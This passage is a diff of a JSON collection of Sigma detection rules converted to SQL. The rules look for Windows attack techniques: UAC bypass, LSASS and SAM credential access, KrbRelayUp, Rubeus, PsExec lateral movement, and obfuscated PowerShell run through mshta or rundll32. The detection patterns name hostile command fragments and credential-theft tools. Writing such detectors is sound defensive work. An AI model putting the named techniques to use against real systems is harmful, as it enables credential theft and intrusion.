TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 
'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], 
+ "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' 
ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', 
'1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' 
ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 
'%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP 
Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs 
WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE 
'%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE 
'%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND 
ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": 
